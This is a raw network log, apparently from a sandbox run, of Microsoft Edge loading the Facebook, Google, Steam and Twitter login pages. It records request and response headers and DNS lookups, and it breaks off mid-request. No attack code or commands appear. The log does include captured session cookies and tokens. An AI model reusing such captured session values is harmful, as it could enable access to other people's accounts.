accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: mXjbZp5JUjt62zr4DVYbGw==
edge-control: cache-maxage=86400s
expires: Mon, 30 Oct 2023 23:11:36 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
x-fb-optimizer: 0
strict-transport-security: max-age=15552000; preload
x-fb-debug: ecK/TzSQe1v5txqNNLiZwEUYs1+87P8E+mVHCux6OlPI+TyipUVh3mkEqn2zNEd6ilPGU/yfQO4slYhrk4VDXg==
date: Sun, 29 Oct 2023 23:11:36 GMT
content-length: 17083
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

GET /images/cookies/cookie_info_popup_image_1.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: VavMdY6kTjDMa/KajpYRaQ==
edge-control: cache-maxage=86400s
expires: Mon, 30 Oct 2023 22:42:59 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
strict-transport-security: max-age=15552000; preload
x-fb-debug: /W7Z4IiR2X3aVGWCQ+dc5NXZP4g6AYCw+MuloeCdBmUDusOIUGfW65IWEQZTSiruumIRw3r6I2nHMQlojTuJxg==
date: Sun, 29 Oct 2023 22:42:59 GMT
content-length: 50380
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

GET /images/cookies/cookie_info_popup_image_2.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: vq/Hc42i1NUD0re9tbXumw==
edge-control: cache-maxage=86400s
expires: Mon, 30 Oct 2023 23:43:31 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
strict-transport-security: max-age=15552000; preload
x-fb-debug: PybV3YjlSBhVM6lJzTYTlKaiZ+wayd6JPiZaZZN76a5n0TyRJ6v1pwvYE61F6vOy0HGeqi1pQrtZH/EB68xX4Q==
date: Sun, 29 Oct 2023 23:43:31 GMT
content-length: 47514
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

GET /images/cookies/cookie_info_popup_image_3.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: YhcU5SV/bTVsWSaxO4wgGA==
edge-control: cache-maxage=86400s
expires: Mon, 30 Oct 2023 23:43:11 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: 57lMhvCPB9EPvzWZ2fMBRiQilyoeUzbO0iw/1uDRCz2WBjr6gugbnE4RPyxvL4TDe7Azfai8ORYc8s1RO73voQ==
date: Sun, 29 Oct 2023 23:43:11 GMT
content-length: 47657
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

GET /images/cookies/cookie_info_popup_image_4.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: Ae8VnBRpCv1xxClCp11bLQ==
edge-control: cache-maxage=86400s
expires: Mon, 30 Oct 2023 20:44:20 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: iDO9TPlmFSzSNBX6SCfv+slA1+O4wSKi5dCmTLs2RSZuZEQU5jlTELW8QNFUuVzI0iTgSF0h5zkVcJYyqn71vg==
date: Sun, 29 Oct 2023 20:44:20 GMT
content-length: 38147
POST

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=1&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

POST /ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=1&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e7145940432
accept-encoding: gzip, deflate, br
content-length: 1990
cache-control: no-cache

Response

HTTP/2.0 200

reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: AxTOE6B745JAZgG7ZSORx71K9ol5BFdPVsmygQPB8ISovsKVwIoHpVZzooAYKQLYGChTSDU3EqcVSwYZufT1Jw==
content-length: 0
date: Mon, 30 Oct 2023 06:49:13 GMT
alt-svc: h3=":443"; ma=86400
POST

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=2&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

POST /ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=2&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e71221240432
accept-encoding: gzip, deflate, br
content-length: 1591
cache-control: no-cache

Response

HTTP/2.0 200

reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: 26InwICh44/51tr9NtsSEp7Q/qOPHZOkOpO93ZCaTrOo1juAHxR8+Exf3foXuqNYqiBQCB/oreZ0ivC44yGxmw==
content-length: 0
date: Mon, 30 Oct 2023 06:49:21 GMT
alt-svc: h3=":443"; ma=86400
DNS

accounts.google.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
DNS

35.201.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.201.240.157.in-addr.arpa

IN PTR

Response

35.201.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams4facebookcom
GET

https://accounts.google.com/

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

content-type: text/html; charset=UTF-8
strict-transport-security: max-age=31536000; includeSubDomains
set-cookie: __Host-GAPS=1:RfMsXQI26u0KOB6427_dGM-RLlnlvQ:UJTtOCV-E2EPAZEA;Path=/;Expires=Wed, 29-Oct-2025 06:48:16 GMT;Secure;HttpOnly;Priority=HIGH
x-frame-options: DENY
content-security-policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
location: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
content-encoding: gzip
date: Mon, 30 Oct 2023 06:48:16 GMT
expires: Mon, 30 Oct 2023 06:48:16 GMT
cache-control: private, max-age=0
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 237
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:RfMsXQI26u0KOB6427_dGM-RLlnlvQ:UJTtOCV-E2EPAZEA

Response

HTTP/2.0 302

content-type: application/binary
set-cookie: __Host-GAPS=1:AIzu9ZTkbLqdQfRzkJKuZsJjL80NLQ:1ysgAxBRBjJTIeog; Expires=Wed, 29-Oct-2025 06:48:17 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:48:17 GMT
location: https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyzNmJ-tC2HnukG8mJuyh4OFoDa8ZwV1vdu2eRuqXfBEYpnpSvVXrEFIY1BZIyomyOTfif_xyw
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
content-security-policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
cross-origin-opener-policy: unsafe-none
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
server: ESF
content-length: 0
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyzNmJ-tC2HnukG8mJuyh4OFoDa8ZwV1vdu2eRuqXfBEYpnpSvVXrEFIY1BZIyomyOTfif_xyw

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyzNmJ-tC2HnukG8mJuyh4OFoDa8ZwV1vdu2eRuqXfBEYpnpSvVXrEFIY1BZIyomyOTfif_xyw HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:AIzu9ZTkbLqdQfRzkJKuZsJjL80NLQ:1ysgAxBRBjJTIeog

Response

HTTP/2.0 302

content-type: text/html; charset=UTF-8
set-cookie: __Host-GAPS=1:_mDlHTJm9LOuksrrW5dtRaMcF5ZuKQ:s3pVq-SSjVto4rfT;Path=/;Expires=Wed, 29-Oct-2025 06:48:18 GMT;Secure;HttpOnly;Priority=HIGH
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:48:18 GMT
location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: require-trusted-types-for 'script';report-uri /cspreport
content-security-policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 379
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:_mDlHTJm9LOuksrrW5dtRaMcF5ZuKQ:s3pVq-SSjVto4rfT

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
x-frame-options: DENY
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
x-ua-compatible: IE=edge
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:48:18 GMT
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
cross-origin-resource-policy: same-site
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

store.steampowered.com

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

store.steampowered.com

IN A

Response

store.steampowered.com

IN A

104.85.0.101
GET

https://store.steampowered.com/login/

MicrosoftEdgeCP.exe

Remote address:

104.85.0.101:443

Request

GET /login/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: store.steampowered.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://store.cloudflare.steamstatic.com/ https://store.cloudflare.steamstatic.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' http://store.steampowered.com https://store.steampowered.com http://127.0.0.1:27060 ws://127.0.0.1:27060 https://community.cloudflare.steamstatic.com/ https://steamcommunity.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://shared.cloudflare.steamstatic.com/ https://checkout.steampowered.com/ https://store.steampowered.com/; frame-src 'self' steam: http://www.youtube.com https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://steamcommunity.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://steamcommunity.com/ https://help.steampowered.com/; frame-ancestors 'none';
Content-Encoding: gzip
Vary: Accept-Encoding
Strict-Transport-Security: max-age=10368000
Content-Length: 5719
Date: Mon, 30 Oct 2023 06:48:15 GMT
Connection: keep-alive
Set-Cookie: steamCountry=NL%7Cdf992469ad58783256e377c74f856554; Path=/; Secure; HttpOnly; SameSite=None
Set-Cookie: sessionid=8e70fbaa49d7ec7a9d4ac038; Path=/; Secure; SameSite=None
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

8.3.197.209.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.3.197.209.in-addr.arpa

IN PTR

Response

8.3.197.209.in-addr.arpa

IN PTR

vip0x008map2sslhwcdnnet
DNS

twitter.com

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

twitter.com

IN A

Response

twitter.com

IN A

104.244.42.1

twitter.com

IN A

104.244.42.129

twitter.com

IN A

104.244.42.193

twitter.com

IN A

104.244.42.65
GET

https://twitter.com/i/flow/login

MicrosoftEdgeCP.exe

Remote address:

104.244.42.1:443

Request

GET /i/flow/login HTTP/2.0
host: twitter.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
